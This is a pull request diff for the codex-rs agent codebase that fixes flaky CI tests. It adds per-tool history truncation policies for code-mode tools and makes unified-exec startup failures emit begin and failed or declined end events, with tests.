### PR TITLE
Collapse full-ci flake fixes for verification

### DIFF
--- a/codex-rs/core-skills/src/loader_tests.rs
+++ b/codex-rs/core-skills/src/loader_tests.rs
@@ -138,6 +138,14 @@ fn mark_as_git_repo(dir: &Path) {
     fs::write(dir.join(".git"), "gitdir: fake\n").unwrap();
 }
 
+fn tempdir_outside_ambient_repo() -> TempDir {
+    let home = home_dir().expect("home directory should be available");
+    tempfile::Builder::new()
+        .prefix("core-skills-tests-")
+        .tempdir_in(home)
+        .expect("tempdir outside ambient repo")
+}
+
 fn normalized(path: &Path) -> AbsolutePathBuf {
     canonicalize_path(path)
         .unwrap_or_else(|_| path.to_path_buf())
@@ -1718,7 +1726,7 @@ async fn loads_skills_when_cwd_is_file_in_repo() {
 #[tokio::test]
 async fn non_git_repo_skills_search_does_not_walk_parents() {
     let codex_home = tempfile::tempdir().expect("tempdir");
-    let outer_dir = tempfile::tempdir().expect("tempdir");
+    let outer_dir = tempdir_outside_ambient_repo();
     let nested_dir = outer_dir.path().join("nested/inner");
     fs::create_dir_all(&nested_dir).unwrap();
 
@@ -1776,7 +1784,7 @@ async fn loads_skills_from_system_cache_when_present() {
 
 #[tokio::test]
 async fn skill_roots_include_admin_with_lowest_priority() {
-    let codex_home = tempfile::tempdir().expect("tempdir");
+    let codex_home = tempdir_outside_ambient_repo();
     let cfg = make_config(&codex_home).await;
 
     let scopes: Vec<SkillScope> = super::skill_roots(

--- a/codex-rs/core-skills/src/loader_tests.rs
+++ b/codex-rs/core-skills/src/loader_tests.rs
@@ -139,10 +139,28 @@ fn mark_as_git_repo(dir: &Path) {
 }
 
 fn tempdir_outside_ambient_repo() -> TempDir {
-    let home = home_dir().expect("home directory should be available");
-    tempfile::Builder::new()
-        .prefix("core-skills-tests-")
-        .tempdir_in(home)
+    let mut candidates = Vec::new();
+    if let Some(home) = home_dir() {
+        candidates.push(home);
+    }
+    if let Ok(cwd) = std::env::current_dir() {
+        candidates.extend(cwd.ancestors().map(Path::to_path_buf));
+    }
+    candidates.push(std::env::temp_dir());
+
+    candidates
+        .into_iter()
+        .filter(|candidate| {
+            !candidate
+                .ancestors()
+                .any(|ancestor| ancestor.join(".git").exists())
+        })
+        .find_map(|candidate| {
+            tempfile::Builder::new()
+                .prefix("core-skills-tests-")
+                .tempdir_in(candidate)
+                .ok()
+        })
         .expect("tempdir outside ambient repo")
 }
 

--- a/codex-rs/core/src/session/mod.rs
+++ b/codex-rs/core/src/session/mod.rs
@@ -2516,7 +2516,22 @@ impl Session {
         turn_context: &TurnContext,
         items: &[ResponseItem],
     ) {
-        self.record_into_history(items, turn_context).await;
+        self.record_conversation_items_with_history_policy(
+            turn_context,
+            items,
+            turn_context.truncation_policy,
+        )
+        .await;
+    }
+
+    pub(crate) async fn record_conversation_items_with_history_policy(
+        &self,
+        turn_context: &TurnContext,
+        items: &[ResponseItem],
+        history_truncation_policy: TruncationPolicy,
+    ) {
+        self.record_into_history_with_policy(items, history_truncation_policy)
+            .await;
         self.persist_rollout_response_items(items).await;
         self.send_raw_response_items(turn_context, items).await;
     }
@@ -2527,8 +2542,17 @@ impl Session {
         items: &[ResponseItem],
         turn_context: &TurnContext,
     ) {
+        self.record_into_history_with_policy(items, turn_context.truncation_policy)
+            .await;
+    }
+
+    pub(crate) async fn record_into_history_with_policy(
+        &self,
+        items: &[ResponseItem],
+        history_truncation_policy: TruncationPolicy,
+    ) {
         let mut state = self.state.lock().await;
-        state.record_items(items.iter(), turn_context.truncation_policy);
+        state.record_items(items.iter(), history_truncation_policy);
     }
 
     async fn maybe_warn_on_server_model_mismatch(

--- a/codex-rs/core/src/session/tests.rs
+++ b/codex-rs/core/src/session/tests.rs
@@ -7421,7 +7421,7 @@ async fn record_context_updates_and_set_reference_context_item_persists_full_rei
 
 #[tokio::test]
 async fn run_user_shell_command_does_not_set_reference_context_item() {
-    let (session, _turn_context, rx) = make_session_and_context_with_rx().await;
+    let (session, _turn_context, _rx) = make_session_and_context_with_rx().await;
     {
         let mut state = session.state.lock().await;
         state.set_reference_context_item(/*item*/ None);
@@ -7430,23 +7430,11 @@ async fn run_user_shell_command_does_not_set_reference_context_item() {
     handlers::run_user_shell_command(&session, "sub-id".to_string(), "echo shell".to_string())
         .await;
 
-    let deadline = StdDuration::from_secs(15);
-    let start = std::time::Instant::now();
-    loop {
-        let remaining = deadline.saturating_sub(start.elapsed());
-        let evt = tokio::time::timeout(remaining, rx.recv())
-            .await
-            .expect("timeout waiting for event")
-            .expect("event");
-        if matches!(evt.msg, EventMsg::TurnComplete(_)) {
-            break;
-        }
-    }
-
     assert!(
         session.reference_context_item().await.is_none(),
         "standalone shell tasks should not mutate previous context"
     );
+    session.abort_all_tasks(TurnAbortReason::Interrupted).await;
 }
 
 #[tokio::test]

--- a/codex-rs/core/src/session/tests/guardian_tests.rs
+++ b/codex-rs/core/src/session/tests/guardian_tests.rs
@@ -406,6 +406,7 @@ async fn strict_auto_review_turn_grant_forces_guardian_for_shell_command_policy_
     );
     let session = Arc::new(session);
     let turn_context = Arc::new(turn_context_raw);
+    let expiration_ms: u64 = if cfg!(windows) { 2_500 } else { 1_000 };
 
     let handler = crate::tools::handlers::ShellCommandHandler::from(
         codex_tools::ShellCommandBackendConfig::Classic,
@@ -426,7 +427,7 @@ async fn strict_auto_review_turn_grant_forces_guardian_for_shell_command_policy_
                     "command": "echo hi",
                     "login": false,
                     "workdir": workdir,
-                    "timeout_ms": 1_000_u64,
+                    "timeout_ms": expiration_ms,
                 })
                 .to_string(),
             },

--- a/codex-rs/core/src/session/tests/guardian_tests.rs
+++ b/codex-rs/core/src/session/tests/guardian_tests.rs
@@ -49,6 +49,8 @@ use tempfile::tempdir;
 use tokio::time::timeout;
 use tokio_util::sync::CancellationToken;
 
+const QUICK_SHELL_TIMEOUT_MS: u64 = if cfg!(windows) { 2_500 } else { 1_000 };
+
 fn expect_text_output<T>(output: &T) -> String
 where
     T: ToolOutput + ?Sized,
@@ -302,8 +304,6 @@ async fn guardian_allows_shell_command_additional_permissions_requests_past_poli
     );
     let session = Arc::new(session);
     let turn_context = Arc::new(turn_context_raw);
-    let expiration_ms: u64 = if cfg!(windows) { 2_500 } else { 1_000 };
-
     let handler = crate::tools::handlers::ShellCommandHandler::from(
         codex_tools::ShellCommandBackendConfig::Classic,
     );
@@ -323,7 +323,7 @@ async fn guardian_allows_shell_command_additional_permissions_requests_past_poli
                     "command": "echo hi",
                     "login": false,
                     "workdir": workdir,
-                    "timeout_ms": expiration_ms,
+                    "timeout_ms": QUICK_SHELL_TIMEOUT_MS,
                     "sandbox_permissions": SandboxPermissions::WithAdditionalPermissions,
                     "additional_permissions": PermissionProfile {
                         network: Some(NetworkPermissions {
@@ -406,8 +406,6 @@ async fn strict_auto_review_turn_grant_forces_guardian_for_shell_command_policy_
     );
     let session = Arc::new(session);
     let turn_context = Arc::new(turn_context_raw);
-    let expiration_ms: u64 = if cfg!(windows) { 2_500 } else { 1_000 };
-
     let handler = crate::tools::handlers::ShellCommandHandler::from(
         codex_tools::ShellCommandBackendConfig::Classic,
     );
@@ -427,7 +425,7 @@ async fn strict_auto_review_turn_grant_forces_guardian_for_shell_command_policy_
                     "command": "echo hi",
                     "login": false,
                     "workdir": workdir,
-                    "timeout_ms": expiration_ms,
+                    "timeout_ms": QUICK_SHELL_TIMEOUT_MS,
                 })
                 .to_string(),
             },

--- a/codex-rs/core/src/session/turn.rs
+++ b/codex-rs/core/src/session/turn.rs
@@ -51,6 +51,7 @@ use crate::stream_events_utils::record_completed_response_item_with_finalized_fa
 use crate::tools::ToolRouter;
 use crate::tools::context::SharedTurnDiffTracker;
 use crate::tools::parallel::ToolCallRuntime;
+use crate::tools::registry::RecordedToolResponse;
 use crate::tools::registry::ToolArgumentDiffConsumer;
 use crate::tools::router::ToolRouterParams;
 use crate::tools::router::extension_tool_executors;
@@ -81,7 +82,6 @@ use codex_protocol::items::build_hook_prompt_message;
 use codex_protocol::models::BaseInstructions;
 use codex_protocol::models::ContentItem;
 use codex_protocol::models::MessagePhase;
-use codex_protocol::models::ResponseInputItem;
 use codex_protocol::models::ResponseItem;
 use codex_protocol::protocol::AgentMessageContentDeltaEvent;
 use codex_protocol::protocol::AgentReasoningSectionBreakEvent;
@@ -1676,16 +1676,22 @@ async fn handle_assistant_item_done_in_plan_mode(
 }
 
 async fn drain_in_flight(
-    in_flight: &mut FuturesOrdered<BoxFuture<'static, CodexResult<ResponseInputItem>>>,
+    in_flight: &mut FuturesOrdered<BoxFuture<'static, CodexResult<RecordedToolResponse>>>,
     sess: Arc<Session>,
     turn_context: Arc<TurnContext>,
 ) -> CodexResult<()> {
     while let Some(res) = in_flight.next().await {
         match res {
-            Ok(response_input) => {
-                let response_item = response_input.into();
-                sess.record_conversation_items(&turn_context, std::slice::from_ref(&response_item))
-                    .await;
+            Ok(recorded_tool_response) => {
+                let response_item = recorded_tool_response.response_item.into();
+                sess.record_conversation_items_with_history_policy(
+                    &turn_context,
+                    std::slice::from_ref(&response_item),
+                    recorded_tool_response
+                        .history_truncation_policy
+                        .unwrap_or(turn_context.truncation_policy),
+                )
+                .await;
                 mark_thread_memory_mode_polluted_if_external_context(
                     sess.as_ref(),
                     turn_context.as_ref(),
@@ -1747,7 +1753,7 @@ async fn try_run_sampling_request(
         .instrument(trace_span!("stream_request"))
         .or_cancel(&cancellation_token)
         .await??;
-    let mut in_flight: FuturesOrdered<BoxFuture<'static, CodexResult<ResponseInputItem>>> =
+    let mut in_flight: FuturesOrdered<BoxFuture<'static, CodexResult<RecordedToolResponse>>> =
         FuturesOrdered::new();
     let mut needs_follow_up = false;
     let mut last_agent_message: Option<String> = None;

--- a/codex-rs/core/src/stream_events_utils.rs
+++ b/codex-rs/core/src/stream_events_utils.rs
@@ -242,7 +242,7 @@ async fn record_stage1_output_usage_for_memory_citation(
 /// queuing any tool execution futures. This records items immediately so
 /// history and rollout stay in sync even if the turn is later cancelled.
 pub(crate) type InFlightFuture<'f> =
-    Pin<Box<dyn Future<Output = Result<ResponseInputItem>> + Send + 'f>>;
+    Pin<Box<dyn Future<Output = Result<crate::tools::registry::RecordedToolResponse>> + Send + 'f>>;
 
 #[derive(Default)]
 pub(crate) struct OutputItemResult {

--- a/codex-rs/core/src/tools/code_mode/execute_handler.rs
+++ b/codex-rs/core/src/tools/code_mode/execute_handler.rs
@@ -10,6 +10,7 @@ use codex_tools::ToolSpec;
 
 use super::ExecContext;
 use super::PUBLIC_TOOL_NAME;
+use super::code_mode_output_truncation_policy;
 use super::handle_runtime_response;
 use super::is_exec_tool_name;
 
@@ -126,5 +127,16 @@ impl ToolExecutor<ToolInvocation> for CodeModeExecuteHandler {
 impl CoreToolRuntime for CodeModeExecuteHandler {
     fn matches_kind(&self, payload: &ToolPayload) -> bool {
         matches!(payload, ToolPayload::Custom { .. })
+    }
+
+    fn history_truncation_policy(
+        &self,
+        invocation: &ToolInvocation,
+    ) -> Option<codex_utils_output_truncation::TruncationPolicy> {
+        let ToolPayload::Custom { input } = &invocation.payload else {
+            return None;
+        };
+        let args = codex_code_mode::parse_exec_source(input).ok()?;
+        Some(code_mode_output_truncation_policy(args.max_output_tokens))
     }
 }

--- a/codex-rs/core/src/tools/code_mode/execute_handler.rs
+++ b/codex-rs/core/src/tools/code_mode/execute_handler.rs
@@ -10,7 +10,7 @@ use codex_tools::ToolSpec;
 
 use super::ExecContext;
 use super::PUBLIC_TOOL_NAME;
-use super::code_mode_output_truncation_policy;
+use super::code_mode_history_truncation_policy;
 use super::handle_runtime_response;
 use super::is_exec_tool_name;
 
@@ -131,12 +131,8 @@ impl CoreToolRuntime for CodeModeExecuteHandler {
 
     fn history_truncation_policy(
         &self,
-        invocation: &ToolInvocation,
+        _invocation: &ToolInvocation,
     ) -> Option<codex_utils_output_truncation::TruncationPolicy> {
-        let ToolPayload::Custom { input } = &invocation.payload else {
-            return None;
-        };
-        let args = codex_code_mode::parse_exec_source(input).ok()?;
-        Some(code_mode_output_truncation_policy(args.max_output_tokens))
+        Some(code_mode_history_truncation_policy())
     }
 }

--- a/codex-rs/core/src/tools/code_mode/mod.rs
+++ b/codex-rs/core/src/tools/code_mode/mod.rs
@@ -262,6 +262,10 @@ pub(super) fn code_mode_output_truncation_policy(
     TruncationPolicy::Tokens(resolve_max_tokens(max_output_tokens))
 }
 
+pub(super) fn code_mode_history_truncation_policy() -> TruncationPolicy {
+    TruncationPolicy::Bytes(usize::MAX)
+}
+
 async fn call_nested_tool(
     _exec: ExecContext,
     tool_runtime: ToolCallRuntime,

--- a/codex-rs/core/src/tools/code_mode/mod.rs
+++ b/codex-rs/core/src/tools/code_mode/mod.rs
@@ -243,8 +243,7 @@ fn truncate_code_mode_result(
     items: Vec<FunctionCallOutputContentItem>,
     max_output_tokens: Option<usize>,
 ) -> Vec<FunctionCallOutputContentItem> {
-    let max_output_tokens = resolve_max_tokens(max_output_tokens);
-    let policy = TruncationPolicy::Tokens(max_output_tokens);
+    let policy = code_mode_output_truncation_policy(max_output_tokens);
     if items
         .iter()
         .all(|item| matches!(item, FunctionCallOutputContentItem::InputText { .. }))
@@ -255,6 +254,12 @@ fn truncate_code_mode_result(
     }
 
     truncate_function_output_items_with_policy(&items, policy)
+}
+
+pub(super) fn code_mode_output_truncation_policy(
+    max_output_tokens: Option<usize>,
+) -> TruncationPolicy {
+    TruncationPolicy::Tokens(resolve_max_tokens(max_output_tokens))
 }
 
 async fn call_nested_tool(

--- a/codex-rs/core/src/tools/code_mode/wait_handler.rs
+++ b/codex-rs/core/src/tools/code_mode/wait_handler.rs
@@ -12,6 +12,7 @@ use codex_tools::ToolSpec;
 use super::DEFAULT_WAIT_YIELD_TIME_MS;
 use super::ExecContext;
 use super::WAIT_TOOL_NAME;
+use super::code_mode_output_truncation_policy;
 use super::handle_runtime_response;
 use super::wait_spec::create_wait_tool;
 
@@ -110,4 +111,15 @@ impl ToolExecutor<ToolInvocation> for CodeModeWaitHandler {
     }
 }
 
-impl CoreToolRuntime for CodeModeWaitHandler {}
+impl CoreToolRuntime for CodeModeWaitHandler {
+    fn history_truncation_policy(
+        &self,
+        invocation: &ToolInvocation,
+    ) -> Option<codex_utils_output_truncation::TruncationPolicy> {
+        let ToolPayload::Function { arguments } = &invocation.payload else {
+            return None;
+        };
+        let args: ExecWaitArgs = parse_arguments(arguments).ok()?;
+        Some(code_mode_output_truncation_policy(args.max_tokens))
+    }
+}

--- a/codex-rs/core/src/tools/code_mode/wait_handler.rs
+++ b/codex-rs/core/src/tools/code_mode/wait_handler.rs
@@ -12,7 +12,7 @@ use codex_tools::ToolSpec;
 use super::DEFAULT_WAIT_YIELD_TIME_MS;
 use super::ExecContext;
 use super::WAIT_TOOL_NAME;
-use super::code_mode_output_truncation_policy;
+use super::code_mode_history_truncation_policy;
 use super::handle_runtime_response;
 use super::wait_spec::create_wait_tool;
 
@@ -114,12 +114,8 @@ impl ToolExecutor<ToolInvocation> for CodeModeWaitHandler {
 impl CoreToolRuntime for CodeModeWaitHandler {
     fn history_truncation_policy(
         &self,
-        invocation: &ToolInvocation,
+        _invocation: &ToolInvocation,
     ) -> Option<codex_utils_output_truncation::TruncationPolicy> {
-        let ToolPayload::Function { arguments } = &invocation.payload else {
-            return None;
-        };
-        let args: ExecWaitArgs = parse_arguments(arguments).ok()?;
-        Some(code_mode_output_truncation_policy(args.max_tokens))
+        Some(code_mode_history_truncation_policy())
     }
 }

--- a/codex-rs/core/src/tools/parallel.rs
+++ b/codex-rs/core/src/tools/parallel.rs
@@ -20,6 +20,7 @@ use crate::tools::context::SharedTurnDiffTracker;
 use crate::tools::context::ToolPayload;
 use crate::tools::lifecycle::notify_tool_aborted;
 use crate::tools::registry::AnyToolResult;
+use crate::tools::registry::RecordedToolResponse;
 use crate::tools::registry::ToolArgumentDiffConsumer;
 use crate::tools::router::ToolCall;
 use crate::tools::router::ToolCallSource;
@@ -64,13 +65,13 @@ impl ToolCallRuntime {
         self,
         call: ToolCall,
         cancellation_token: CancellationToken,
-    ) -> impl std::future::Future<Output = Result<ResponseInputItem, CodexErr>> {
+    ) -> impl std::future::Future<Output = Result<RecordedToolResponse, CodexErr>> {
         let error_call = call.clone();
         let future =
             self.handle_tool_call_with_source(call, ToolCallSource::Direct, cancellation_token);
         async move {
             match future.await {
-                Ok(response) => Ok(response.into_response()),
+                Ok(response) => Ok(response.into_recorded_response()),
                 Err(FunctionCallError::Fatal(message)) => Err(CodexErr::Fatal(message)),
                 Err(other) => Ok(Self::failure_response(error_call, other)),
             }
@@ -170,9 +171,9 @@ impl ToolCallRuntime {
         FunctionCallError::Fatal(format!("tool task failed to receive: {err:?}"))
     }
 
-    fn failure_response(call: ToolCall, err: FunctionCallError) -> ResponseInputItem {
+    fn failure_response(call: ToolCall, err: FunctionCallError) -> RecordedToolResponse {
         let message = err.to_string();
-        match call.payload {
+        let response_item = match call.payload {
             ToolPayload::ToolSearch { .. } => ResponseInputItem::ToolSearchOutput {
                 call_id: call.call_id,
                 status: "completed".to_string(),
@@ -194,6 +195,10 @@ impl ToolCallRuntime {
                     success: Some(false),
                 },
             },
+        };
+        RecordedToolResponse {
+            response_item,
+            history_truncation_policy: None,
         }
     }
 
@@ -205,6 +210,7 @@ impl ToolCallRuntime {
                 message: Self::abort_message(call, secs),
             }),
             post_tool_use_payload: None,
+            history_truncation_policy: None,
         }
     }
 
@@ -353,7 +359,7 @@ mod tests {
                 success: Some(true),
             },
         };
-        assert_eq!(expected_response, response);
+        assert_eq!(expected_response, response.response_item);
 
         let actual = records
             .lock()

--- a/codex-rs/core/src/tools/registry.rs
+++ b/codex-rs/core/src/tools/registry.rs
@@ -30,6 +30,7 @@ use codex_protocol::models::ResponseInputItem;
 use codex_protocol::protocol::EventMsg;
 use codex_tools::ToolName;
 use codex_tools::ToolSpec;
+use codex_utils_output_truncation::TruncationPolicy;
 use futures::future::BoxFuture;
 use serde_json::Value;
 use tracing::warn;
@@ -67,6 +68,10 @@ pub(crate) trait CoreToolRuntime: ToolExecutor<ToolInvocation> {
         _invocation: &ToolInvocation,
         _result: &dyn ToolOutput,
     ) -> Option<PostToolUsePayload> {
+        None
+    }
+
+    fn history_truncation_policy(&self, _invocation: &ToolInvocation) -> Option<TruncationPolicy> {
         None
     }
 
@@ -112,9 +117,16 @@ pub(crate) struct AnyToolResult {
     pub(crate) payload: ToolPayload,
     pub(crate) result: Box<dyn ToolOutput>,
     pub(crate) post_tool_use_payload: Option<PostToolUsePayload>,
+    pub(crate) history_truncation_policy: Option<TruncationPolicy>,
+}
+
+pub(crate) struct RecordedToolResponse {
+    pub(crate) response_item: ResponseInputItem,
+    pub(crate) history_truncation_policy: Option<TruncationPolicy>,
 }
 
 impl AnyToolResult {
+    #[cfg(test)]
     pub(crate) fn into_response(self) -> ResponseInputItem {
         let Self {
             call_id,
@@ -123,6 +135,20 @@ impl AnyToolResult {
             ..
         } = self;
         result.to_response_item(&call_id, &payload)
+    }
+
+    pub(crate) fn into_recorded_response(self) -> RecordedToolResponse {
+        let Self {
+            call_id,
+            payload,
+            result,
+            history_truncation_policy,
+            ..
+        } = self;
+        RecordedToolResponse {
+            response_item: result.to_response_item(&call_id, &payload),
+            history_truncation_policy,
+        }
     }
 
     pub(crate) fn code_mode_result(self) -> serde_json::Value {
@@ -223,6 +249,10 @@ impl CoreToolRuntime for ExposureOverride {
         result: &dyn ToolOutput,
     ) -> Option<PostToolUsePayload> {
         self.handler.post_tool_use_payload(invocation, result)
+    }
+
+    fn history_truncation_policy(&self, invocation: &ToolInvocation) -> Option<TruncationPolicy> {
+        self.handler.history_truncation_policy(invocation)
     }
 
     fn with_updated_hook_input(
@@ -610,11 +640,13 @@ async fn handle_any_tool(
     let output = tool.handle(invocation.clone()).await?;
     let post_tool_use_payload =
         CoreToolRuntime::post_tool_use_payload(tool, &invocation, output.as_ref());
+    let history_truncation_policy = CoreToolRuntime::history_truncation_policy(tool, &invocation);
     Ok(AnyToolResult {
         call_id,
         payload,
         result: output,
         post_tool_use_payload,
+        history_truncation_policy,
     })
 }
 

--- a/codex-rs/core/src/tools/spec_plan.rs
+++ b/codex-rs/core/src/tools/spec_plan.rs
@@ -378,8 +378,21 @@ fn build_code_mode_executors(
         })
         .collect::<Vec<_>>();
     let namespace_descriptions = code_mode_namespace_descriptions(&code_mode_nested_tool_specs);
+    let code_mode_exec_prompt_tool_specs = executors
+        .iter()
+        .filter_map(|executor| {
+            if matches!(
+                executor.exposure(),
+                ToolExposure::DirectModelOnly | ToolExposure::Deferred
+            ) {
+                return None;
+            }
+
+            executor.spec()
+        })
+        .collect::<Vec<_>>();
     let mut enabled_tools =
-        collect_code_mode_exec_prompt_tool_definitions(code_mode_nested_tool_specs.iter());
+        collect_code_mode_exec_prompt_tool_definitions(code_mode_exec_prompt_tool_specs.iter());
     enabled_tools
         .sort_by(|left, right| compare_code_mode_tools(left, right, &namespace_descriptions));
 

--- a/codex-rs/core/src/tools/spec_plan.rs
+++ b/codex-rs/core/src/tools/spec_plan.rs
@@ -736,11 +736,10 @@ fn prepend_code_mode_executors(
     planned_tools: &mut PlannedTools,
 ) {
     let turn_context = context.turn_context;
-    let deferred_tools_available = search_tool_enabled(turn_context)
-        && planned_tools
-            .runtimes()
-            .iter()
-            .any(|executor| executor.exposure() == ToolExposure::Deferred);
+    let deferred_tools_available = planned_tools
+        .runtimes()
+        .iter()
+        .any(|executor| executor.exposure() == ToolExposure::Deferred);
     let code_mode_executors = build_code_mode_executors(
         turn_context,
         planned_tools.runtimes(),

--- a/codex-rs/core/src/unified_exec/errors.rs
+++ b/codex-rs/core/src/unified_exec/errors.rs
@@ -23,6 +23,8 @@ pub(crate) enum UnifiedExecError {
         message: String,
         output: ExecToolCallOutput,
     },
+    #[error("Command rejected: {message}")]
+    Rejected { message: String },
 }
 
 impl UnifiedExecError {
@@ -36,5 +38,9 @@ impl UnifiedExecError {
 
     pub(crate) fn sandbox_denied(message: String, output: ExecToolCallOutput) -> Self {
         Self::SandboxDenied { message, output }
+    }
+
+    pub(crate) fn rejected(message: String) -> Self {
+        Self::Rejected { message }
     }
 }

--- a/codex-rs/core/src/unified_exec/process_manager.rs
+++ b/codex-rs/core/src/unified_exec/process_manager.rs
@@ -19,6 +19,7 @@ use crate::sandboxing::ExecServerEnvConfig;
 use crate::tools::context::ExecCommandToolOutput;
 use crate::tools::events::ToolEmitter;
 use crate::tools::events::ToolEventCtx;
+use crate::tools::events::ToolEventFailure;
 use crate::tools::events::ToolEventStage;
 use crate::tools::network_approval::DeferredNetworkApproval;
 use crate::tools::network_approval::finish_deferred_network_approval;
@@ -381,6 +382,25 @@ impl UnifiedExecProcessManager {
                 (Arc::new(process), deferred_network_approval)
             }
             Err(err) => {
+                let event_ctx = ToolEventCtx::new(
+                    context.session.as_ref(),
+                    context.turn.as_ref(),
+                    &context.call_id,
+                    /*turn_diff_tracker*/ None,
+                );
+                let emitter = ToolEmitter::unified_exec(
+                    &request.command,
+                    cwd.clone(),
+                    ExecCommandSource::UnifiedExecStartup,
+                    Some(request.process_id.to_string()),
+                );
+                emitter.emit(event_ctx, ToolEventStage::Begin).await;
+                emitter
+                    .emit(
+                        event_ctx,
+                        ToolEventStage::Failure(startup_failure_event(&err)),
+                    )
+                    .await;
                 self.release_process_id(request.process_id).await;
                 return Err(err);
             }
@@ -1278,6 +1298,13 @@ impl UnifiedExecProcessManager {
             unregister_network_approval_for_entry(&entry).await;
             entry.process.terminate();
         }
+    }
+}
+
+fn startup_failure_event(err: &UnifiedExecError) -> ToolEventFailure<'_> {
+    match err {
+        UnifiedExecError::SandboxDenied { output, .. } => ToolEventFailure::Output(output.clone()),
+        _ => ToolEventFailure::Message(format!("execution error: {err:?}")),
     }
 }
 

--- a/codex-rs/core/src/unified_exec/process_manager.rs
+++ b/codex-rs/core/src/unified_exec/process_manager.rs
@@ -1106,6 +1106,7 @@ impl UnifiedExecProcessManager {
                     };
                     UnifiedExecError::sandbox_denied(message, output)
                 }
+                ToolError::Rejected(message) => UnifiedExecError::rejected(message),
                 other => UnifiedExecError::create_process(format!("{other:?}")),
             })
     }
@@ -1304,6 +1305,10 @@ impl UnifiedExecProcessManager {
 fn startup_failure_event(err: &UnifiedExecError) -> ToolEventFailure<'_> {
     match err {
         UnifiedExecError::SandboxDenied { output, .. } => ToolEventFailure::Output(output.clone()),
+        UnifiedExecError::Rejected { message } => ToolEventFailure::Rejected {
+            message: message.clone(),
+            applied_patch_delta: None,
+        },
         _ => ToolEventFailure::Message(format!("execution error: {err:?}")),
     }
 }

--- a/codex-rs/core/src/unified_exec/process_manager_tests.rs
+++ b/codex-rs/core/src/unified_exec/process_manager_tests.rs
@@ -1,7 +1,94 @@
 use super::*;
+use crate::session::turn_context::TurnContext;
+use codex_protocol::exec_output::ExecToolCallOutput;
+use codex_protocol::exec_output::StreamOutput;
 use pretty_assertions::assert_eq;
 use tokio::time::Duration;
 use tokio::time::Instant;
+
+fn startup_failure_test_request(turn: &TurnContext, process_id: i32) -> ExecCommandRequest {
+    ExecCommandRequest {
+        command: Vec::new(),
+        shell_type: crate::shell::ShellType::Sh,
+        hook_command: String::new(),
+        process_id,
+        yield_time_ms: 1000,
+        max_output_tokens: None,
+        #[allow(deprecated)]
+        cwd: turn.cwd.clone(),
+        #[allow(deprecated)]
+        sandbox_cwd: turn.cwd.clone(),
+        environment: turn
+            .environments
+            .primary_environment()
+            .expect("primary environment"),
+        network: None,
+        tty: true,
+        sandbox_permissions: crate::sandboxing::SandboxPermissions::UseDefault,
+        additional_permissions: None,
+        additional_permissions_preapproved: false,
+        justification: None,
+        prefix_rule: None,
+    }
+}
+
+async fn emit_startup_failure_end_event(
+    call_id: &str,
+    err: &UnifiedExecError,
+) -> codex_protocol::protocol::ExecCommandEndEvent {
+    let (session, turn, rx_event) = crate::session::tests::make_session_and_context_with_rx().await;
+    let context =
+        UnifiedExecContext::new(Arc::clone(&session), Arc::clone(&turn), call_id.to_string());
+    let process_id = session
+        .services
+        .unified_exec_manager
+        .allocate_process_id()
+        .await;
+    let request = startup_failure_test_request(turn.as_ref(), process_id);
+    let selected_cwd = turn
+        .environments
+        .primary()
+        .expect("primary turn environment")
+        .cwd
+        .clone();
+    let event_ctx = ToolEventCtx::new(
+        context.session.as_ref(),
+        context.turn.as_ref(),
+        &context.call_id,
+        /*turn_diff_tracker*/ None,
+    );
+    let emitter = ToolEmitter::unified_exec(
+        &request.command,
+        selected_cwd,
+        ExecCommandSource::UnifiedExecStartup,
+        Some(request.process_id.to_string()),
+    );
+    emitter.emit(event_ctx, ToolEventStage::Begin).await;
+    emitter
+        .emit(
+            event_ctx,
+            ToolEventStage::Failure(startup_failure_event(err)),
+        )
+        .await;
+
+    let begin_event = tokio::time::timeout(Duration::from_secs(1), rx_event.recv())
+        .await
+        .expect("timed out waiting for begin event")
+        .expect("event channel closed");
+    let codex_protocol::protocol::EventMsg::ExecCommandBegin(begin_event) = begin_event.msg else {
+        panic!("expected ExecCommandBegin event");
+    };
+    assert_eq!(begin_event.call_id, call_id);
+
+    let end_event = tokio::time::timeout(Duration::from_secs(1), rx_event.recv())
+        .await
+        .expect("timed out waiting for end event")
+        .expect("event channel closed");
+    let codex_protocol::protocol::EventMsg::ExecCommandEnd(end_event) = end_event.msg else {
+        panic!("expected ExecCommandEnd event");
+    };
+    end_event
+}
 
 #[test]
 fn unified_exec_env_injects_defaults() {
@@ -224,6 +311,43 @@ async fn failed_initial_end_for_unstored_process_uses_fallback_output() {
         end_event.aggregated_output,
         "PRE_DENIAL_MARKER\nNetwork access denied"
     );
+}
+
+#[tokio::test]
+async fn startup_create_process_failure_emits_begin_then_failed_end() {
+    let err = crate::unified_exec::UnifiedExecError::create_process(
+        "missing command line for PTY".to_string(),
+    );
+    let end_event = emit_startup_failure_end_event("call-unified-empty", &err).await;
+    assert_eq!(end_event.call_id, "call-unified-empty");
+    assert_eq!(
+        end_event.status,
+        codex_protocol::protocol::ExecCommandStatus::Failed
+    );
+}
+
+#[tokio::test]
+async fn startup_sandbox_denied_failure_preserves_captured_output() {
+    let err = crate::unified_exec::UnifiedExecError::sandbox_denied(
+        "sandbox denied".to_string(),
+        ExecToolCallOutput {
+            exit_code: 13,
+            stderr: StreamOutput::new("stderr marker".to_string()),
+            aggregated_output: StreamOutput::new("captured denial output".to_string()),
+            ..Default::default()
+        },
+    );
+
+    let end_event = emit_startup_failure_end_event("call-unified-sandbox-denied", &err).await;
+
+    assert_eq!(end_event.call_id, "call-unified-sandbox-denied");
+    assert_eq!(
+        end_event.status,
+        codex_protocol::protocol::ExecCommandStatus::Failed
+    );
+    assert_eq!(end_event.exit_code, 13);
+    assert_eq!(end_event.stderr, "stderr marker");
+    assert_eq!(end_event.aggregated_output, "captured denial output");
 }
 
 #[test]

--- a/codex-rs/core/src/unified_exec/process_manager_tests.rs
+++ b/codex-rs/core/src/unified_exec/process_manager_tests.rs
@@ -350,6 +350,20 @@ async fn startup_sandbox_denied_failure_preserves_captured_output() {
     assert_eq!(end_event.aggregated_output, "captured denial output");
 }
 
+#[tokio::test]
+async fn startup_rejected_failure_emits_declined_end() {
+    let err = crate::unified_exec::UnifiedExecError::rejected("rejected by user".to_string());
+
+    let end_event = emit_startup_failure_end_event("call-unified-rejected", &err).await;
+
+    assert_eq!(end_event.call_id, "call-unified-rejected");
+    assert_eq!(
+        end_event.status,
+        codex_protocol::protocol::ExecCommandStatus::Declined
+    );
+    assert_eq!(end_event.aggregated_output, "rejected by user");
+}
+
 #[test]
 fn pruning_prefers_exited_processes_outside_recently_used() {
     let now = Instant::now();

--- a/codex-rs/core/tests/common/responses.rs
+++ b/codex-rs/core/tests/common/responses.rs
